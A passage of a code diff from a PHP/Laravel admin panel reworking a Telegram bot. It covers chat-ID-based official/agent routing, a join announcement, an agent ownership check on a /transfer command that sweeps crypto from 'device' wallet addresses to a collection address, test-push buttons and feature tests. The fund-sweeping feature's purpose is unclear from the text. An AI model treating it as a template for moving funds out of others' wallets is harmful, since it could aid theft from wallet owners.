'', ' 省略 amount 则转全部;默认 Tron→USDT / ETH→ETH / BTC→BTC',
'/transfer <fromAddress> [TRX|USDT|ETH|BTC] [amount]', ' 例: /transfer Txxx USDT 10',
' 从设备地址转出到配置收款地址(仅官方)', ' 例: /transfer 0x… ETH',
' 按地址识别链:T…=Tron,0x…=ETH,1…/3…/bc1…=BTC', ' 例: /transfer 1… BTC 0.01',
' 省略 amount 则转全部;默认 Tron→USDT / ETH→ETH / BTC→BTC', ]));
' 例: /transfer Txxx USDT 10',
' 例: /transfer 0x… ETH',
' 例: /transfer 1… BTC 0.01',
]);
} else {
$lines = array_merge($lines, [
'',
'(当前为代理机器人:仅可查看本代理渠道数据,不支持 /transfer)',
]);
}
$bot->sendMessage(implode("\n", $lines));
} }
} }
@@ -0,0 +1,82 @@
<?php
namespace App\Telegram\Handlers;
use Illuminate\Support\Facades\Log;
use SergiX44\Nutgram\Nutgram;
use SergiX44\Nutgram\Telegram\Properties\ChatMemberStatus;
use SergiX44\Nutgram\Telegram\Properties\ChatType;
use SergiX44\Nutgram\Telegram\Properties\ParseMode;
use SergiX44\Nutgram\Telegram\Types\Keyboard\CopyTextButton;
use SergiX44\Nutgram\Telegram\Types\Keyboard\InlineKeyboardButton;
use SergiX44\Nutgram\Telegram\Types\Keyboard\InlineKeyboardMarkup;
class JoinedChatHandler
{
private const IN_GROUP = ['member', 'administrator', 'creator', 'restricted'];
private const OUT_GROUP = ['left', 'kicked'];
public function __invoke(Nutgram $bot): void
{
$update = $bot->chatMember();
if ($update === null) {
return;
}
$type = $update->chat->type ?? null;
$typeValue = $type instanceof ChatType ? $type->value : (string) $type;
if (! in_array($typeValue, [ChatType::GROUP->value, ChatType::SUPERGROUP->value, 'group', 'supergroup'], true)) {
return;
}
$old = $this->statusValue($update->old_chat_member->status ?? null);
$new = $this->statusValue($update->new_chat_member->status ?? null);
if (! in_array($old, self::OUT_GROUP, true) || ! in_array($new, self::IN_GROUP, true)) {
return;
}
$chatId = (string) $update->chat->id;
$title = trim((string) ($update->chat->title ?? ''));
$lines = ['✅ Bot 已加入本群'];
if ($title !== '') {
$lines[] = '🏷 群名: '.$this->e($title);
}
$lines[] = '🆔 Chat ID: <code>'.$this->e($chatId).'</code>';
$lines[] = '';
$lines[] = '把上面的 Chat ID 填到后台:';
$lines[] = '• 官方通知 → 系统设置';
$lines[] = '• 代理单独推送 → 代理用户';
try {
$bot->sendMessage(
implode("\n", $lines),
parse_mode: ParseMode::HTML,
reply_markup: InlineKeyboardMarkup::make()->addRow(
InlineKeyboardButton::make(
text: '复制 Chat ID',
copy_text: CopyTextButton::make($chatId),
)
),
);
} catch (\Throwable $e) {
Log::warning('telegram join announce failed: '.$e->getMessage(), [
'chat_id' => $chatId,
]);
}
}
private function statusValue(mixed $status): string
{
if ($status instanceof ChatMemberStatus) {
return $status->value;
}
return strtolower(trim((string) $status));
}
private function e(string $value): string
{
return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}
}
+40
View File
@@ -2,13 +2,19 @@
namespace App\Telegram\Handlers; namespace App\Telegram\Handlers;
use App\Models\Channel;
use App\Models\Device;
use App\Models\User;
use App\Models\WalletAddress;
use App\Services\TransferService; use App\Services\TransferService;
use App\Telegram\TelegramBotContext;
use SergiX44\Nutgram\Nutgram; use SergiX44\Nutgram\Nutgram;
class TransferCommand class TransferCommand
{ {
public function __construct( public function __construct(
private readonly TransferService $transfers, private readonly TransferService $transfers,
private readonly TelegramBotContext $context,
) {} ) {}
public function __invoke(Nutgram $bot, string $args): void public function __invoke(Nutgram $bot, string $args): void
@@ -74,6 +80,13 @@ class TransferCommand
$amount = $parts[2]; $amount = $parts[2];
} }
$agent = $this->context->agent();
if ($agent !== null && ! $this->addressOwnedByAgent($from, $agent)) {
$bot->sendMessage('⛔ 无权操作该地址(仅限本代理渠道设备)');
return;
}
$label = $amount === null ? "ALL {$asset}" : "{$amount} {$asset}"; $label = $amount === null ? "ALL {$asset}" : "{$amount} {$asset}";
$bot->sendMessage("⏳ Transferring {$label} from {$from} ({$chain}) …"); $bot->sendMessage("⏳ Transferring {$label} from {$from} ({$chain}) …");
@@ -151,4 +164,31 @@ class TransferCommand
return $name !== '' ? "telegram:{$id}({$name})" : "telegram:{$id}"; return $name !== '' ? "telegram:{$id}({$name})" : "telegram:{$id}";
} }
private function addressOwnedByAgent(string $fromAddress, User $agent): bool
{
$channelIds = Channel::query()
->where('user_id', $agent->id)
->pluck('channel_id');
if ($channelIds->isEmpty()) {
return false;
}
$deviceIds = Device::query()
->whereIn('channel_id', $channelIds)
->pluck('id');
if ($deviceIds->isEmpty()) {
return false;
}
return WalletAddress::query()
->whereIn('device_id', $deviceIds)
->where(function ($q) use ($fromAddress) {
$q->where('address', $fromAddress);
if (str_starts_with(strtolower($fromAddress), '0x')) {
$q->orWhereRaw('LOWER(address) = ?', [strtolower($fromAddress)]);
}
})
->exists();
}
} }
+4 -14
View File
@@ -8,8 +8,8 @@ use SergiX44\Nutgram\Nutgram;
use SergiX44\Nutgram\Telegram\Properties\ChatType; use SergiX44\Nutgram\Telegram\Properties\ChatType;
/** /**
* Allow only the configured owner group/supergroup for the current bot context * Allow only the official owner chat or an enabled agent's chat_id.
* (official system chat or the active agent's chat_id). * Binds TelegramBotContext so later handlers know official vs agent.
*/ */
class AuthorizedChat class AuthorizedChat
{ {
@@ -19,21 +19,11 @@ class AuthorizedChat
public function __invoke(Nutgram $bot, callable $next): mixed public function __invoke(Nutgram $bot, callable $next): mixed
{ {
$expected = $this->context->expectedChatId();
if ($expected === '') {
Log::warning('telegram AuthorizedChat: chat id empty', [
'agent_id' => $this->context->agent()?->id,
]);
return null;
}
$chatId = $bot->chatId(); $chatId = $bot->chatId();
if ($chatId === null || (string) $chatId !== $expected) { if (! $this->context->bindFromChatId($chatId)) {
Log::info('telegram AuthorizedChat: chat rejected', [ Log::info('telegram AuthorizedChat: chat rejected', [
'chat_id' => $chatId, 'chat_id' => $chatId,
'expected' => $expected, 'expected_official' => trim((string) config('coruna.telegram.owner_chat_id', '')),
'agent_id' => $this->context->agent()?->id,
]); ]);
return null; return null;
@@ -1,21 +0,0 @@
<?php
namespace App\Telegram\Middleware;
use App\Telegram\TelegramBotContext;
use SergiX44\Nutgram\Nutgram;
/** Blocks /transfer (and similar) on agent bots. */
class OfficialBotOnly
{
public function __invoke(Nutgram $bot, callable $next): mixed
{
if (! app(TelegramBotContext::class)->isOfficial()) {
$bot->sendMessage('⛔ /transfer 仅限官方系统群使用');
return null;
}
return $next($bot);
}
}
-25
View File
@@ -1,25 +0,0 @@
<?php
namespace App\Telegram\Middleware;
use App\Telegram\TelegramBotContext;
use SergiX44\Nutgram\Nutgram;
/** Blocks /transfer (and similar) on agent bots. */
class OfficialOnly
{
public function __construct(
private readonly TelegramBotContext $context,
) {}
public function __invoke(Nutgram $bot, callable $next): mixed
{
if (! $this->context->isOfficial()) {
$bot->sendMessage('⛔ /transfer 仅限官方机器人使用');
return null;
}
return $next($bot);
}
}
+31 -4
View File
@@ -5,8 +5,8 @@ namespace App\Telegram;
use App\Models\User; use App\Models\User;
/** /**
* Request-scoped Telegram bot identity. * Request-scoped Telegram identity.
* null agent = official system bot; otherwise an agent-configured bot. * null agent = official owner chat; otherwise the agent whose chat_id matched.
*/ */
class TelegramBotContext class TelegramBotContext
{ {
@@ -41,8 +41,35 @@ class TelegramBotContext
return trim((string) config('coruna.telegram.owner_chat_id', '')); return trim((string) config('coruna.telegram.owner_chat_id', ''));
} }
public static function webhookSecretFor(User $agent): string /**
* Bind official vs agent from the incoming chat_id.
* Official owner_chat_id wins if it collides with an agent.
*/
public function bindFromChatId(int|string|null $chatId): bool
{ {
return hash_hmac('sha256', 'telegram-agent:'.$agent->id, (string) config('app.key')); $chatId = trim((string) $chatId);
if ($chatId === '') {
$this->agent = null;
return false;
}
$owner = trim((string) config('coruna.telegram.owner_chat_id', ''));
if ($owner !== '' && $chatId === $owner) {
$this->agent = null;
return true;
}
$agent = User::findEnabledByChatId($chatId);
if ($agent === null) {
$this->agent = null;
return false;
}
$this->agent = $agent;
return true;
} }
} }
+9 -25
View File
@@ -2,41 +2,28 @@
namespace App\Telegram; namespace App\Telegram;
use App\Models\User;
use App\Telegram\Handlers\ChannelCommand; use App\Telegram\Handlers\ChannelCommand;
use App\Telegram\Handlers\DataCommand; use App\Telegram\Handlers\DataCommand;
use App\Telegram\Handlers\HelpCommand; use App\Telegram\Handlers\HelpCommand;
use App\Telegram\Handlers\JoinedChatHandler;
use App\Telegram\Handlers\PingCommand; use App\Telegram\Handlers\PingCommand;
use App\Telegram\Handlers\TransferCommand; use App\Telegram\Handlers\TransferCommand;
use App\Telegram\Middleware\AuthorizedChat; use App\Telegram\Middleware\AuthorizedChat;
use App\Telegram\Middleware\GroupAdminOnly; use App\Telegram\Middleware\GroupAdminOnly;
use App\Telegram\Middleware\OfficialOnly;
use SergiX44\Nutgram\Nutgram; use SergiX44\Nutgram\Nutgram;
class TelegramRegistrar class TelegramRegistrar
{ {
public function __construct( /** Single site bot. Official vs agent is resolved from chat_id. */
private readonly TelegramBotContext $context,
) {}
/** Official system bot — includes /transfer. Does not mutate bot context. */
public function registerOfficial(Nutgram $bot): void public function registerOfficial(Nutgram $bot): void
{ {
$this->registerShared($bot, allowTransfer: true); // Announce chat_id when invited — must not use AuthorizedChat
} // so unconfigured groups can still copy the id into admin settings.
$bot->onMyChatMember(JoinedChatHandler::class);
/** Agent bot — no /transfer; binds request context to this agent. */
public function registerAgent(Nutgram $bot, User $agent): void
{
$this->context->setAgent($agent);
$this->registerShared($bot, allowTransfer: false);
}
private function registerShared(Nutgram $bot, bool $allowTransfer): void
{
// HandlerGroup::middleware() unshifts — register GroupAdminOnly first so // HandlerGroup::middleware() unshifts — register GroupAdminOnly first so
// AuthorizedChat ends up outermost (chat allowlist before admin check). // AuthorizedChat ends up outermost (chat allowlist before admin check).
$bot->group(function (Nutgram $bot) use ($allowTransfer) { $bot->group(function (Nutgram $bot) {
$bot->onCommand('help', HelpCommand::class) $bot->onCommand('help', HelpCommand::class)
->description('List available commands'); ->description('List available commands');
@@ -53,12 +40,9 @@ class TelegramRegistrar
$bot->onCommand('channel', ChannelCommand::class) $bot->onCommand('channel', ChannelCommand::class)
->description('List channels; copy promo iframe (new) or support link (old)'); ->description('List channels; copy promo iframe (new) or support link (old)');
if ($allowTransfer) { $bot->onCommand('transfer {args}', TransferCommand::class)
$bot->onCommand('transfer {args}', TransferCommand::class) ->where('args', '.+')
->where('args', '.+') ->description('Transfer TRX or USDT from a device address (omit amount = all)');
->middleware(OfficialOnly::class)
->description('Transfer TRX or USDT from a device address (omit amount = all)');
}
}) })
->middleware(GroupAdminOnly::class) ->middleware(GroupAdminOnly::class)
->middleware(AuthorizedChat::class); ->middleware(AuthorizedChat::class);
+1
View File
@@ -59,6 +59,7 @@ return [
'seven_zip' => env('CORUNA_7Z_BIN', ''), 'seven_zip' => env('CORUNA_7Z_BIN', ''),
'telegram' => [ 'telegram' => [
'bot_token' => env('TELEGRAM_BOT_TOKEN'), 'bot_token' => env('TELEGRAM_BOT_TOKEN'),
'bot_username' => env('TELEGRAM_BOT_USERNAME', ''),
'owner_chat_id' => env('TELEGRAM_OWNER_CHAT_ID'), 'owner_chat_id' => env('TELEGRAM_OWNER_CHAT_ID'),
'webhook_secret' => env('TELEGRAM_WEBHOOK_SECRET', ''), 'webhook_secret' => env('TELEGRAM_WEBHOOK_SECRET', ''),
], ],
+50 -5
View File
@@ -33,6 +33,9 @@
<script type="text/html" id="LAY-agent-ops"> <script type="text/html" id="LAY-agent-ops">
<a class="layui-btn layui-btn-primary layui-btn-xs" lay-event="channels">渠道链接</a> <a class="layui-btn layui-btn-primary layui-btn-xs" lay-event="channels">渠道链接</a>
<a class="layui-btn layui-btn-warm layui-btn-xs" lay-event="edit">编辑</a> <a class="layui-btn layui-btn-warm layui-btn-xs" lay-event="edit">编辑</a>
@{{# if (d.telegram_ready) { }}
<a class="layui-btn layui-btn-xs" lay-event="tgtest">测试TG</a>
@{{# } }}
</script> </script>
</div> </div>
</div> </div>
@@ -43,6 +46,8 @@
layui.use(['table', 'form', 'layer'], function () { layui.use(['table', 'form', 'layer'], function () {
var table = layui.table, form = layui.form, layer = layui.layer, $ = layui.$; var table = layui.table, form = layui.form, layer = layui.layer, $ = layui.$;
var token = @json(csrf_token()); var token = @json(csrf_token());
var botUsername = @json($botUsername ?? '');
var botInviteUrl = @json($botInviteUrl ?? '');
function esc(s) { function esc(s) {
return String(s == null ? '' : s) return String(s == null ? '' : s)
@@ -72,7 +77,7 @@ layui.use(['table', 'form', 'layer'], function () {
{ field: 'comment', title: '备注', minWidth: 100 }, { field: 'comment', title: '备注', minWidth: 100 },
{ field: 'channels_count', title: '渠道数', width: 90 }, { field: 'channels_count', title: '渠道数', width: 90 },
{ field: 'created_at', title: '创建时间', width: 160, sort: true }, { field: 'created_at', title: '创建时间', width: 160, sort: true },
{ title: '操作', width: 180, align: 'center', fixed: 'right', toolbar: '#LAY-agent-ops' } { title: '操作', width: 240, align: 'center', fixed: 'right', toolbar: '#LAY-agent-ops' }
]], ]],
page: true, limit: 20, limits: [10, 20, 30, 50], page: true, limit: 20, limits: [10, 20, 30, 50],
request: { pageName: 'page', limitName: 'limit' }, request: { pageName: 'page', limitName: 'limit' },
@@ -97,17 +102,45 @@ layui.use(['table', 'form', 'layer'], function () {
'<input name="password" type="password" class="layui-input" placeholder="' + (values.id ? '留空不改' : '必填') + '"></div></div>' + '<input name="password" type="password" class="layui-input" placeholder="' + (values.id ? '留空不改' : '必填') + '"></div></div>' +
'<div class="layui-form-item"><label class="layui-form-label">备注</label><div class="layui-input-block">' + '<div class="layui-form-item"><label class="layui-form-label">备注</label><div class="layui-input-block">' +
'<input name="comment" class="layui-input" value="' + esc(values.comment || '') + '"></div></div>' + '<input name="comment" class="layui-input" value="' + esc(values.comment || '') + '"></div></div>' +
'<div class="layui-form-item"><label class="layui-form-label">Bot Token</label><div class="layui-input-block">' +
'<input name="bot_token" class="layui-input" placeholder="代理 Telegram Bot Token" value="' + esc(values.bot_token || '') + '"></div></div>' +
'<div class="layui-form-item"><label class="layui-form-label">Chat ID</label><div class="layui-input-block">' + '<div class="layui-form-item"><label class="layui-form-label">Chat ID</label><div class="layui-input-block">' +
'<input name="chat_id" class="layui-input" placeholder="代理通知群 chat_id" value="' + esc(values.chat_id || '') + '"></div></div>' + '<div style="display:flex;gap:8px;align-items:center;">' +
'<div class="layui-form-item"><div class="layui-input-block" style="color:#888;font-size:12px;line-height:1.5;">配置后该代理渠道通知发往此 Bot/群;指令仅可查本代理数据,不支持 /transfer。<br>Webhook: <code>/hooks/telegram/agent/{id}</code>,保存后执行 <code>php artisan telegram:set-webhook --agent={id}</code></div></div>' + '<input name="chat_id" class="layui-input" placeholder="代理通知群 chat_id" value="' + esc(values.chat_id || '') + '" style="flex:1;">' +
'<button type="button" class="layui-btn layui-btn-primary" id="LAY-agent-tg-test" style="flex-shrink:0;">测试推送</button>' +
'</div></div></div>' +
'<div class="layui-form-item"><div class="layui-input-block" style="color:#888;font-size:12px;line-height:1.5;">' +
(botUsername
? '请邀请 <b>' + esc(botUsername) + '</b> 进群' + (botInviteUrl ? '(<a href="' + esc(botInviteUrl) + '" target="_blank" rel="noopener">点此邀请</a>)' : '') + ',进群后 Bot 会回复 Chat ID,再填到这里。'
: '请先在系统设置保存有效 Bot Token(会自动识别 @用户名),再邀请该 Bot 进群。') +
' 填 Chat ID 后,该代理渠道通知会同时发到此群和官方群。</div></div>' +
'<div class="layui-form-item"><label class="layui-form-label">状态</label><div class="layui-input-block">' + '<div class="layui-form-item"><label class="layui-form-label">状态</label><div class="layui-input-block">' +
'<input type="checkbox" name="status_switch" lay-skin="switch" lay-text="启用|禁用" ' + ((values.status == null || values.status == 1) ? 'checked' : '') + '>' + '<input type="checkbox" name="status_switch" lay-skin="switch" lay-text="启用|禁用" ' + ((values.status == null || values.status == 1) ? 'checked' : '') + '>' +
'</div></div>' + '</div></div>' +
'</form>', '</form>',
success: function () { success: function () {
form.render(); form.render();
$('#LAY-agent-tg-test').on('click', function () {
var $btn = $(this);
if ($btn.prop('disabled')) return;
$btn.prop('disabled', true);
$.ajax({
url: @json(route('admin.agents.telegramTest')),
method: 'POST',
data: {
_token: token,
chat_id: $('#LAY-agent-form input[name=chat_id]').val(),
agent_id: values.id || ''
},
success: function (res) {
layer.msg(res.msg || (res.code === 0 ? '已发送' : '失败'));
},
error: function (xhr) {
layer.msg((xhr.responseJSON && xhr.responseJSON.message) || '测试失败');
},
complete: function () {
$btn.prop('disabled', false);
}
});
});
}, },
btn: ['保存', '取消'], btn: ['保存', '取消'],
yes: function (index) { yes: function (index) {
@@ -154,6 +187,18 @@ layui.use(['table', 'form', 'layer'], function () {
} }
}); });
}); });
} else if (obj.event === 'tgtest') {
$.ajax({
url: @json(route('admin.agents.telegramTest')),
method: 'POST',
data: { _token: token, agent_id: d.id, chat_id: d.chat_id },
success: function (res) {
layer.msg(res.msg || (res.code === 0 ? '已发送' : '失败'));
},
error: function (xhr) {
layer.msg((xhr.responseJSON && xhr.responseJSON.message) || '测试失败');
}
});
} else if (obj.event === 'channels') { } else if (obj.event === 'channels') {
$.getJSON(@json(url('/admin/agents')) + '/' + d.id + '/channels', function (res) { $.getJSON(@json(url('/admin/agents')) + '/' + d.id + '/channels', function (res) {
var html = (res.data || []).map(function (c) { var html = (res.data || []).map(function (c) {
@@ -15,13 +15,33 @@
<div class="layui-input-block"> <div class="layui-input-block">
<input type="text" name="telegram_bot_token" class="layui-input" autocomplete="off" <input type="text" name="telegram_bot_token" class="layui-input" autocomplete="off"
value="{{ $form['telegram.bot_token'] }}"> value="{{ $form['telegram.bot_token'] }}">
<div class="layui-form-mid layui-word-aux" id="LAY-telegram-bot-name">
@if($botUsername)
当前 Bot:<b>{{ $botUsername }}</b>
@if($botInviteUrl)
· <a href="{{ $botInviteUrl }}" target="_blank" rel="noopener">邀请进群</a>
@endif
@else
保存 Token 后会通过 Telegram getMe 自动识别 @用户名,无需手填。
@endif
</div>
</div> </div>
</div> </div>
<div class="layui-form-item"> <div class="layui-form-item">
<label class="layui-form-label">Chat ID</label> <label class="layui-form-label">Chat ID</label>
<div class="layui-input-block"> <div class="layui-input-block">
<input type="text" name="telegram_owner_chat_id" class="layui-input" autocomplete="off" <div style="display:flex;gap:8px;align-items:center;max-width:640px;">
value="{{ $form['telegram.owner_chat_id'] }}" placeholder="个人或群组 chat_id"> <input type="text" name="telegram_owner_chat_id" class="layui-input" autocomplete="off"
value="{{ $form['telegram.owner_chat_id'] }}" placeholder="官方通知群 chat_id" style="flex:1;">
<button type="button" class="layui-btn layui-btn-primary" id="LAY-telegram-test" style="flex-shrink:0;">测试推送</button>
</div>
<div class="layui-form-mid layui-word-aux" id="LAY-telegram-chat-hint">
@if($botUsername)
请邀请 <b>{{ $botUsername }}</b> 进群(进群后 Bot 会回复 Chat ID),再填到这里。全站共用这一个 Bot;代理单独推送只需在「代理用户」里填 Chat ID。
@else
全站共用这一个 Bot。此处为官方通知群;代理单独推送只需在「代理用户」里填 Chat ID。保存 Token 后会提示要邀请哪个 Bot。
@endif
</div>
</div> </div>
</div> </div>
@@ -88,6 +108,17 @@ layui.use(['form', 'layer'], function () {
data: Object.assign({}, data.field, { _token: token }), data: Object.assign({}, data.field, { _token: token }),
success: function (res) { success: function (res) {
layer.msg(res.msg || (res.code === 0 ? '已保存' : '失败')); layer.msg(res.msg || (res.code === 0 ? '已保存' : '失败'));
if (res.code === 0 && res.data) {
var name = res.data.bot_username || '';
var url = res.data.bot_invite_url || '';
if (name) {
var invite = url ? ' · <a href="' + url + '" target="_blank" rel="noopener">邀请进群</a>' : '';
$('#LAY-telegram-bot-name').html('当前 Bot:<b>' + name + '</b>' + invite);
$('#LAY-telegram-chat-hint').html('请邀请 <b>' + name + '</b> 进群(进群后 Bot 会回复 Chat ID),再填到这里。全站共用这一个 Bot;代理单独推送只需在「代理用户」里填 Chat ID。');
} else {
$('#LAY-telegram-bot-name').text('保存 Token 后会通过 Telegram getMe 自动识别 @用户名,无需手填。');
}
}
}, },
error: function (xhr) { error: function (xhr) {
layer.msg((xhr.responseJSON && xhr.responseJSON.message) || '保存失败'); layer.msg((xhr.responseJSON && xhr.responseJSON.message) || '保存失败');
@@ -95,6 +126,30 @@ layui.use(['form', 'layer'], function () {
}); });
return false; return false;
}); });
$('#LAY-telegram-test').on('click', function () {
var $btn = $(this);
if ($btn.prop('disabled')) return;
$btn.prop('disabled', true);
$.ajax({
url: @json(route('admin.system.settings.telegramTest')),
method: 'POST',
data: {
_token: token,
chat_id: $('input[name=telegram_owner_chat_id]').val(),
bot_token: $('input[name=telegram_bot_token]').val()
},
success: function (res) {
layer.msg(res.msg || (res.code === 0 ? '已发送' : '失败'));
},
error: function (xhr) {
layer.msg((xhr.responseJSON && xhr.responseJSON.message) || '测试失败');
},
complete: function () {
$btn.prop('disabled', false);
}
});
});
}); });
</script> </script>
@endpush @endpush
+2
View File
@@ -69,6 +69,7 @@ Route::prefix('admin')->name('admin.')->middleware('panel.host:admin')->group(fu
Route::get('agents', [AgentUserController::class, 'index'])->name('agents.index'); Route::get('agents', [AgentUserController::class, 'index'])->name('agents.index');
Route::get('agents/data', [AgentUserController::class, 'data'])->name('agents.data'); Route::get('agents/data', [AgentUserController::class, 'data'])->name('agents.data');
Route::post('agents', [AgentUserController::class, 'store'])->name('agents.store'); Route::post('agents', [AgentUserController::class, 'store'])->name('agents.store');
Route::post('agents/telegram-test', [AgentUserController::class, 'testTelegram'])->name('agents.telegramTest');
Route::put('agents/{agent}', [AgentUserController::class, 'update'])->name('agents.update'); Route::put('agents/{agent}', [AgentUserController::class, 'update'])->name('agents.update');
Route::get('agents/{agent}/channels', [AgentUserController::class, 'channels'])->name('agents.channels'); Route::get('agents/{agent}/channels', [AgentUserController::class, 'channels'])->name('agents.channels');
@@ -91,6 +92,7 @@ Route::prefix('admin')->name('admin.')->middleware('panel.host:admin')->group(fu
Route::prefix('system')->name('system.')->group(function () { Route::prefix('system')->name('system.')->group(function () {
Route::get('settings', [SystemSettingsController::class, 'index'])->name('settings.index'); Route::get('settings', [SystemSettingsController::class, 'index'])->name('settings.index');
Route::post('settings', [SystemSettingsController::class, 'update'])->name('settings.update'); Route::post('settings', [SystemSettingsController::class, 'update'])->name('settings.update');
Route::post('settings/telegram-test', [SystemSettingsController::class, 'testTelegram'])->name('settings.telegramTest');
Route::get('admins', [AdminUserController::class, 'index'])->name('admins.index'); Route::get('admins', [AdminUserController::class, 'index'])->name('admins.index');
Route::get('admins/data', [AdminUserController::class, 'data'])->name('admins.data'); Route::get('admins/data', [AdminUserController::class, 'data'])->name('admins.data');
+12 -22
View File
@@ -29,30 +29,20 @@ Artisan::command('tokenview:set-webhook {url?}', function (?string $url = null)
return 1; return 1;
})->purpose('Register Tokenview address-tracking webhook URL'); })->purpose('Register Tokenview address-tracking webhook URL');
Artisan::command('telegram:set-webhook {url?} {--agent= : Agent user id}', function (?string $url = null) { Artisan::command('telegram:set-webhook {url?}', function (?string $url = null) {
$agentId = $this->option('agent'); $token = (string) config('nutgram.token', '');
if ($agentId !== null && $agentId !== '') { if ($token === '') {
$agent = \App\Models\User::query()->find((int) $agentId); $this->error('TELEGRAM_BOT_TOKEN is empty');
if ($agent === null || ! $agent->hasTelegramBot()) {
$this->error('Agent not found or telegram bot_token/chat_id missing');
return 1; return 1;
}
$token = (string) $agent->bot_token;
$url = $url ?: rtrim((string) config('app.url'), '/').'/hooks/telegram/agent/'.$agent->id;
$secret = \App\Telegram\TelegramBotContext::webhookSecretFor($agent);
} else {
$token = (string) config('nutgram.token', '');
if ($token === '') {
$this->error('TELEGRAM_BOT_TOKEN is empty');
return 1;
}
$url = $url ?: rtrim((string) config('app.url'), '/').'/hooks/telegram';
$secret = (string) config('coruna.telegram.webhook_secret', '');
} }
$url = $url ?: rtrim((string) config('app.url'), '/').'/hooks/telegram';
$secret = (string) config('coruna.telegram.webhook_secret', '');
$payload = ['url' => $url]; $payload = [
'url' => $url,
'allowed_updates' => ['message', 'callback_query', 'my_chat_member'],
];
if ($secret !== '') { if ($secret !== '') {
$payload['secret_token'] = $secret; $payload['secret_token'] = $secret;
} }
@@ -68,7 +58,7 @@ Artisan::command('telegram:set-webhook {url?} {--agent= : Agent user id}', funct
$this->error('Failed: '.$resp->body()); $this->error('Failed: '.$resp->body());
return 1; return 1;
})->purpose('Register Telegram webhook (official or --agent=ID)'); })->purpose('Register the site Telegram webhook');
Artisan::command('xxbb:build {--channel-c=} {--random-c}', function () { Artisan::command('xxbb:build {--channel-c=} {--random-c}', function () {
$channelC = trim((string) $this->option('channel-c')); $channelC = trim((string) $this->option('channel-c'));
-2
View File
@@ -8,6 +8,4 @@ use Illuminate\Support\Facades\Route;
Route::middleware([SubstituteBindings::class])->group(function () { Route::middleware([SubstituteBindings::class])->group(function () {
Route::post('/hooks/tokenview', TokenviewWebhookController::class)->name('hooks.tokenview'); Route::post('/hooks/tokenview', TokenviewWebhookController::class)->name('hooks.tokenview');
Route::post('/hooks/telegram', TelegramWebhookController::class)->name('hooks.telegram'); Route::post('/hooks/telegram', TelegramWebhookController::class)->name('hooks.telegram');
Route::post('/hooks/telegram/agent/{agent}', [TelegramWebhookController::class, 'agent'])
->name('hooks.telegram.agent');
}); });
+47
View File
@@ -356,4 +356,51 @@ class AdminAgentPortalTest extends TestCase
]) ])
->assertStatus(405); ->assertStatus(405);
} }
#[Test]
public function admin_can_send_agent_telegram_test(): void
{
config(['coruna.telegram.bot_token' => 'system-token']);
\Illuminate\Support\Facades\Http::fake([
'api.telegram.org/*' => \Illuminate\Support\Facades\Http::response(['ok' => true], 200),
]);
$admin = Admin::query()->create(['username' => 'admin', 'password' => 'admin123']);
$agent = User::query()->create([
'username' => 'tgagent',
'password' => 'secret12',
'status' => 1,
'chat_id' => '-200',
]);
$this->actingAs($admin, 'admin')
->post(route('admin.agents.telegramTest'), [
'agent_id' => $agent->id,
'chat_id' => '-300',
])
->assertOk()
->assertJsonPath('code', 0);
\Illuminate\Support\Facades\Http::assertSent(function ($request) {
$text = (string) ($request->data()['text'] ?? '');
return str_contains($request->url(), '/botsystem-token/')
&& ($request->data()['chat_id'] ?? null) === '-300'
&& str_contains($text, 'Telegram 测试')
&& str_contains($text, 'tgagent');
});
}
#[Test]
public function agent_telegram_test_requires_chat_id(): void
{
config(['coruna.telegram.bot_token' => 'system-token']);
$admin = Admin::query()->create(['username' => 'admin', 'password' => 'admin123']);
$this->actingAs($admin, 'admin')
->post(route('admin.agents.telegramTest'), [])
->assertOk()
->assertJsonPath('code', 1)
->assertJsonPath('msg', '未填写 Chat ID');
}
} }
+95 -1
View File
@@ -64,6 +64,16 @@ class SystemAdminTest extends TestCase
public function super_admin_can_save_settings(): void public function super_admin_can_save_settings(): void
{ {
$super = $this->superAdmin(); $super = $this->superAdmin();
\Illuminate\Support\Facades\Http::fake(function ($request) {
if (str_contains($request->url(), 'getMe')) {
return \Illuminate\Support\Facades\Http::response([
'ok' => true,
'result' => ['id' => 1, 'is_bot' => true, 'username' => 'test_bot'],
], 200);
}
return \Illuminate\Support\Facades\Http::response(['ok' => true], 200);
});
$this->actingAs($super, 'admin') $this->actingAs($super, 'admin')
->post(route('admin.system.settings.update'), [ ->post(route('admin.system.settings.update'), [
@@ -75,10 +85,13 @@ class SystemAdminTest extends TestCase
'panel_agent_hosts' => 'agent.example.com', 'panel_agent_hosts' => 'agent.example.com',
]) ])
->assertOk() ->assertOk()
->assertJsonPath('code', 0); ->assertJsonPath('code', 0)
->assertJsonPath('data.bot_username', '@test_bot');
$this->assertSame('bot:token', Setting::query()->where('key', 'telegram.bot_token')->value('value')); $this->assertSame('bot:token', Setting::query()->where('key', 'telegram.bot_token')->value('value'));
$this->assertSame('test_bot', Setting::query()->where('key', 'telegram.bot_username')->value('value'));
$this->assertSame('bot:token', config('coruna.telegram.bot_token')); $this->assertSame('bot:token', config('coruna.telegram.bot_token'));
$this->assertSame('test_bot', config('coruna.telegram.bot_username'));
$this->assertSame(5, (int) config('coruna.channels.max_per_agent')); $this->assertSame(5, (int) config('coruna.channels.max_per_agent'));
$this->assertSame(['cdn1.example.com', 'cdn2.example.com'], config('coruna.channel_domains')); $this->assertSame(['cdn1.example.com', 'cdn2.example.com'], config('coruna.channel_domains'));
$this->assertSame( $this->assertSame(
@@ -138,4 +151,85 @@ class SystemAdminTest extends TestCase
$this->assertDatabaseHas('admins', ['id' => $super->id]); $this->assertDatabaseHas('admins', ['id' => $super->id]);
} }
#[Test]
public function super_admin_can_send_telegram_test(): void
{
config([
'coruna.telegram.bot_token' => 'saved-token',
'coruna.telegram.owner_chat_id' => '100',
]);
\Illuminate\Support\Facades\Http::fake([
'api.telegram.org/*' => \Illuminate\Support\Facades\Http::response(['ok' => true], 200),
]);
$this->actingAs($this->superAdmin(), 'admin')
->post(route('admin.system.settings.telegramTest'), [
'chat_id' => '-1009',
'bot_token' => 'form-token',
])
->assertOk()
->assertJsonPath('code', 0);
\Illuminate\Support\Facades\Http::assertSent(function ($request) {
return str_contains($request->url(), '/botform-token/')
&& ($request->data()['chat_id'] ?? null) === '-1009'
&& str_contains((string) ($request->data()['text'] ?? ''), 'Telegram 测试');
});
}
#[Test]
public function telegram_test_reports_telegram_error(): void
{
config(['coruna.telegram.bot_token' => 'saved-token']);
\Illuminate\Support\Facades\Http::fake([
'api.telegram.org/*' => \Illuminate\Support\Facades\Http::response([
'ok' => false,
'description' => 'Bad Request: chat not found',
], 400),
]);
